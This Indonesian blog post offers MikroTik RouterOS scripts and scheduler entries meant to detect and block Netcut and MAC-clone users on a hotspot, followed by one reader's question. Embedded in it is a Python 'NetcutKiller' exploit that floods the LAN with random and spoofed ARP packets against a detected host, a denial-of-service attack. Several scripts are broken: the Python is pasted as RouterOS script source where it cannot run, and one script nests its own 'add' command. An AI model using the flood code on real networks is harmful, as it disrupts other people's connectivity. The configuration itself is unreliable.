Pasti semuanya, sudah tidak sabar yach..? hehehe.. tanpa basa-basi lagi langsung saja kita mulai postingan kali ini.
System-Script Mikrotik:
Masuk ke dalam setingan Router Mikrotik Anda via Winbox, dan klik new terminal. Copy-Paste Script di bawah ini:
- Script Anti-Netcut 1, 2, 3 + Anti MAC-Clone
/system script
add name=antinetcut1 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source=":local hosts [/ip dhcp-server lease find]\r\
\n:local pcname \"\"\r\
\n:local pcnum 0\r\
\n:global hacklist \"\"\r\
\n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\
\_blank, nothing will be logged)\r\
\n:local debug 1\r\
\n\r\
\n:foreach h1 in=\$hosts do={\r\
\n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
\n:if ([:len \$host] >0) do {\r\
\n:set pcname (\$pcname . \",\" . \$host)\r\
\n:set pcnum (\$pcnum + 1)\r\
\n}\r\
\n}\r\
\n\r\
\n:local pcnameArr [:toarray \$pcname];\r\
\n\r\
\n:foreach h2 in=\$pcnameArr do={\r\
\n:local hh 0\r\
\n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
\n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
\n:if (\$hh>2) do={ \r\
\n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \
else={:set hacklist \$h2}\r\
\n}\r\
\n}\r\
\n}\r\
\n\r\
\n# monitor results in logfile once an hour \r\
\n:local timer [:pick [/system clock get time] 3 5]\r\
\n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
\n:if ([:len \$hacklist] >0) do={\r\
\n:log warning (\"New Hacklist: \" . \$hacklist)\r\
\n}\r\
\n}\r\
\n"
add name=antinetcut2 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source=":local host\r\
\n:local ipnum\r\
\n:local unum\r\
\n:local usr\r\
\n:local i\r\
\n:global hacklist\r\
\n\r\
\n:foreach host in=\$hacklist do={\r\
\n:foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
\n:set ipnum [/ip dhcp-server lease get \$i address]\r\
\n:set unum [/ip hotspot active find address=\$ipnum]\r\
\n:if ([:len \$unum] >0) do {\r\
\n:set usr [/ip hotspot active get \$unum user]\r\
\n:log warning (\$host . \" \" . \$ipnum . \" \" . \$usr)\r\
\n/ip hotspot active remove \$unum\r\
\n}\r\
\n}\r\
\n}\r\
\n"
add name=antinetcut3 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source=":local hosts [:toarray \"comp1,comp2\"]\r\
\n:local host;\r\
\n:local ipnum;\r\
\n:local unum;\r\
\n:local usr;\r\
\n:local i;\r\
\n\r\
\n:foreach host in=\$hosts do={\r\
\n :foreach i in= [/ip dhcp-server lease find host-name=\$host] do={\r\
\n :set ipnum [/ip dhcp-server lease get \$i address];\r\
\n :set unum [/ip hotspot active find address=\$ipnum];\r\
\n :set usr [/ip hotspot active get \$unum user];\r\
\n :log warning (\$host . \" \" . \$ipnum . \" \" . \$usr);\r\
\n /ip hotspot active remove \$unum\r\
\n /ip dhcp-server lease remove [/ip dhcp-server lease find host-name=\
\$host]\r\
\n }\r\
\n}\r\
\n:\r\
\n"
- Script untuk Flush DNS, script ini berguna untuk membersihkan cache DNS kita, yang di-dumping oleh klien yang tidak bertanggung jawab.
/system script
add name=cacheflush policy=ftp,reboot,read,write,policy,test,winbox,password \
source="/ip dns cache flush"
- Script ini adalah script Netcut-Killer oleh MAYASEVEN menggunakan bahasa Phyton, bisa dipadukan dengan script2 di atas untuk memberangus software sejenis Netcut2-an dan MAC-Clone2-an.
/system script
add name=phyton-anti-net-cut policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source="#!/usr/bin/env python\r\
\n#Exploit Title: Netcut Denial of Service Vulnerability\r\
\n#Author: MaYaSeVeN\r\
\n#Blog: http://mayaseven.blogspot.com\r\
\n#PoC: Video http://www.youtube.com/user/mayaseven\r\
\n# Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAx\
s/wSGL1tKGflc/s1600/a.png\r\
\n#Version: Netcut 2\r\
\n#Software Link: http://www.mediafire.com/\?jiiyq2wcpp41266\r\
\n#Tested on: Windows Xp, Windows 7\r\
\n#Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, S\
umedt, Rocky Sharma\r\
\n \r\
\nfrom scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf\r\
\nimport commands,os,sys\r\
\n \r\
\n#gw_mac = commands.getoutput(\"arp -i %s | grep %s\" % (conf.iface,conf.if\
ace)).split()[2]\r\
\ngw_ip = commands.getoutput(\"ip route list | grep default\").split()[2]\r\
\n \r\
\ndef protect(gw_ip,gw_mac):\r\
\n os.popen(\"arp -s %s %s\" %(gw_ip,gw_mac))\r\
\n print \"Protected himself\"\r\
\n \r\
\ndef detect():\r\
\n ans = sniff(filter='arp',timeout=7)\r\
\n target=[]\r\
\n for r in ans.res:\r\
\n target.append(r.sprintf(\"%ARP.pdst% %ARP.hwsrc% %ARP.psrc%\")\
) \r\
\n return target\r\
\n \r\
\ndef preattack(gw_ip):\r\
\n num = []\r\
\n count = 0\r\
\n target = 0\r\
\n temp = 0\r\
\n print \"Detecting...\"\r\
\n d = detect()\r\
\n for i in range(len(d)):\r\
\n if d[i].split()[0] == \"255.255.255.255\":\r\
\n num.append(d.count(d[i])) \r\
\n if d.count(d[i]) > count:\r\
\n count = d.count(d[i])\r\
\n target = i\r\
\n if d[i].split()[0] == gw_ip:\r\
\n temp += 1 \r\
\n if len(d) < 7:\r\
\n print \"[-] No one use Netcut or try again\"\r\
\n exit()\r\
\n if len(num)*7 < temp:\r\
\n num[:] = []\r\
\n count = 0\r\
\n result = float(temp)/len(d)*100\r\
\n for j in range(len(d)):\r\
\n if d[i].split()[0] == gw_ip:\r\
\n num.append(d.count(d[j]))\r\
\n if d.count(d[i]) > count:\r\
\n count = d.count(d[i])\r\
\n target = i\r\
\n num.reverse()\r\
\n result = float(temp)/len(d)*100\r\
\n print target \r\
\n else:\r\
\n num.reverse()\r\
\n result = float(num[0]+temp)/len(d)*100\r\
\n \r\
\n print \"There is a possibility that \" + str(result) + \"%\"\r\
\n if result>= 50:\r\
\n target_mac = d[target].split()[1]\r\
\n target_ip = d[target].split()[2]\r\
\n print \"[+]Detected, Netcut using by IP %s MAC %s\" %(target_ip,ta\
rget_mac)\r\
\n attack(target_mac,target_ip,gw_ip) \r\
\n else:\r\
\n print \"[-] No one use Netcut or try again\"\r\
\n \r\
\ndef attack(target_mac,target_ip,gw_ip):\r\
\n print \"[+]Counter Attack !!!\"\r\
\n e = Ether(dst=\"FF:FF:FF:FF:FF:FF\")\r\
\n while 1:\r\
\n a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(\
),op=1)\r\
\n p = e/a/Padding(\"\\x00\"*18)\r\
\n sendp(p,verbose=0)\r\
\n a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_ma\
c,op=2)\r\
\n p1 = e/a1/Padding(\"\\x00\"*18)\r\
\n sendp(p1,verbose=0)\r\
\n \r\
\nif __name__ == '__main__':\r\
\n os.system(\"clear\")\r\
\n print \"###################################################\"\r\
\n print \" __ __ __ __ _____ __ __ _ _\"\r\
\n print \"| \\/ | \\ \\ / / / ____| \\ \\ / / | \\ | |\"\
\r\
\n print \"| \\ / | __ \\ \\_/ /_ _| (___ __\\ \\ / /__| \\| |\"\
\r\
\n print \"| |\\/| |/ _\\ \\ / _\\ |\\___ \\ / _ \\ \\/ / _ \\ . \\ \
|\"\r\
\n print \"| | | | (_| || | (_| |____) | __/\\ / __/ |\\ |\"\r\
\n print \"|_| |_|\\__,_||_|\\__,_|_____/ \\___| \\/ \\___|_| \\_|\"\
\r\
\n print \" \"\r\
\n print \"###################################################\"\r\
\n print \"\"\r\
\n print \"http://mayaseven.blogspot.com\"\r\
\n print \"\"\r\
\n if len(sys.argv) == 2 or len(sys.argv) == 3:\r\
\n if len(sys.argv) == 2:\r\
\n conf.iface=sys.argv[1]\r\
\n preattack(gw_ip)\r\
\n if len(sys.argv) == 3:\r\
\n conf.iface=sys.argv[1]\r\
\n gw_mac = sys.argv[2]\r\
\n protect(gw_ip,gw_mac)\r\
\n preattack(gw_ip)\r\
\n else:\r\
\n print '''Mode: \r\
\n1.)Attack only\r\
\nUsage: NetcutKiller <Interface>\r\
\ne.g. NetcutKiller.py wlan0\r\
\n \r\
\n2.)Attack with protect himself\r\
\nUsage: NetcutKiller <Interface> <MAC_Gateway> \r\
\ne.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF \r\
\n'''"
- Script untuk clear-connection (Membersihkan Koneksi). Anda bebas menggunakan script ini atau tidak.
add name=clear-connections policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source="add name=clear-connections policy=ftp,reboot,read,write,policy,test,\
winbox,password,sniff,sensitive,api source=\":log info message=\\\"clearing \
connections begin\\\r\
\n \\\"\\r\\\r\
\n \\n:foreach i in=[/ip firewall connection find] do={/ip firewall conne\
ction remove \\\$i}\\r\\\r\
\n \\n:log info message=\\\"clearing connections end\\\"\\r\\\r\
\n \\n\"\r\
\n"
- Script Anti Spofing, silakan disesuaikan dengan network anda
/system script
add name=ip-spoofing policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
source=":local interfacesubnet [/ip address get [/ip\r\
\naddress find where interface=ether3-hotspot]\r\
\naddress]; /ip firewall address-list add\r\
\naddress=\$interfacesubnet list=ipv4-ether1-gateway-\r\
\ninterfacesubnet"
System-Scheduler Mikrotik:
Setelah itu masuk kembali dalam setingan Router Mikrotik Anda via Winbox, dan klik new terminal. Copy-Paste Script di bawah ini untuk menjalankan System-Script Mikrotik di atas secara periodik:
/system scheduler
add disabled=no interval=15s name=anti-mac-clone on-event=":local hosts [/ip dhc\
p-server lease find]\r\
\n:local pcname \"\"\r\
\n:local pcnum 0\r\
\n:global hacklist \"\"\r\
\n# To log the value of \$hacklist each hour, make debug 1 (if \$hacklist is\
\_blank, nothing will be logged)\r\
\n:local debug 1\r\
\n\r\
\n:foreach h1 in=\$hosts do={\r\
\n:local host [/ip dhcp-server lease get \$h1 host-name] \r\
\n:if ([:len \$host] >0) do {\r\
\n:set pcname (\$pcname . \",\" . \$host)\r\
\n:set pcnum (\$pcnum + 1)\r\
\n}\r\
\n}\r\
\n\r\
\n:local pcnameArr [:toarray \$pcname];\r\
\n\r\
\n:foreach h2 in=\$pcnameArr do={\r\
\n:local hh 0\r\
\n:if (!([:find \$hacklist \$h2]>=0)) do={\r\
\n:foreach k in=\$pcnameArr do={ :if (\$k=\$h2) do={:set hh (\$hh + 1) } }\r\
\n:if (\$hh>2) do={ \r\
\n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h2)} \
else={:set hacklist \$h2}\r\
\n}\r\
\n}\r\
\n}\r\
\n\r\
\n# monitor results in logfile once an hour \r\
\n:local timer [:pick [/system clock get time] 3 5]\r\
\n:if ((\$debug > 0) || (\$timer >= \"58\")) do={ \r\
\n:if ([:len \$hacklist] >0) do={\r\
\n:log warning (\"New Hacklist: \" . \$hacklist)\r\
\n}\r\
\n}\r\
\n" policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:01
add disabled=no interval=6h name=cacheflush on-event=cacheflush policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=23:59:59
add disabled=no interval=12h name=clear-connections on-event=clear-connections \
policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=21:00:00
add disabled=no interval=15s name=antinetcut1 on-event=antinetcut1 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:02
add disabled=no interval=15s name=antinetcut2 on-event=antinetcut2 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:03
add disabled=no interval=15s name=antinetcut3 on-event=antinetcut3 policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:04
add disabled=no interval=15s name=phyton-anti-net-cut on-event=\
phyton-anti-net-cut policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:06
add disabled=no interval=15s name=ip-spoofing on-event=ip-spoofing policy=\
ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
start-date=jan/01/2012 start-time=00:00:05
Nah, sampai di sini berahirlah artikel saya. Semoga dapat bermanfaat. Dan sampai jumpa pada artikel saya berikutnya.
ane masih newbie gan. jadi tiap kali ngisi script harus 'new terminal' y? jadi script yang diatas ini dalam 'new terminal' yang berbeda2?
ReplyDelete